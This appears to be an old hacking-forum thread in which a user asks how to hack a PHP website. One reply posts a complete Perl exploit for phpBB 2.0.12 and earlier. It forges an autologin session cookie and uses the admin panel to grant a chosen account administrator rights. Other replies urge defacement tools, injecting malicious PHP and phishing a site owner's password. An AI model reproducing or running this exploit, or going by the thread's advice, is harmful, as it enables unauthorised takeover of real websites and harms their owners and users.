not a clue.
hey does anyone have an exploit to hack a php website?
not a clue.
[IMG]https://i157.photobucke*****m/albums/t54/murckleman/nub1.jpg[/IMG]
you are a lyar this adress is to your habamon not to exp[loits hack
#!/usr/bin/perl -w
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: phpBB • View topic - phpBB 2.0.13 released - Critical Update
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)
# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...
if (@ARGV < 3)
{
print q(
++++++++++++++++++++++++++++++++++++++++++++++++++ +
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++ ++
);
exit;
}
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "https://";
$request .= $host;
$request .= $path;
use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
$proxy =~ s/(https:\/\/)//eg;
$browser->proxy("http" , "https://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}
print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;
print "Trying to give user:$user admin status...\n";
$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";
# milw0rm.com [2005-03-21]
ryanterror (05-04-2009)
PHP is processed on server side and completely invisible on client side. near impossible to 'hack'
ryanterror (05-04-2009)
Try to use a defacer. I have used it when my friend gave me one but it's kinda hard to understand even i have a tutorial. The one who made that defacer hacked microsoft france site.
ryanterror (05-04-2009)
way to fail, he said he wants to hack a php site, not phpbb forum script, fail again for posting a public exploit that you cant even use.
to answer the question i would require a link to the site in question or informaiton about php scripts its running.
php is processed server sided but retrives information from the cilent, when dealing with hacking logins you use the language php, to communicate directly with mysql which holds the user and passwords, and either exploit and read from the mysql tables or by pass the login buy making the site belive you entered a vaild login.
in short find or create a exploit. insert the malicious php code ie retrive usernames or create users.
Last edited by GG2GG; 05-28-2009 at 12:10 PM.
you can do packet editing at php right?
“Those who control the past, control the future: who controls the present controls the past” ~ George Orwell
Its me, Dreamgun
There is a lot of ways to manipulate information and hack web sites. Hell if you're clever enough, you could just phish the site owner's password haha. I've found some tricks and scripts that have all pretty much sent false information, or constructed, to their server to rip out important aspects.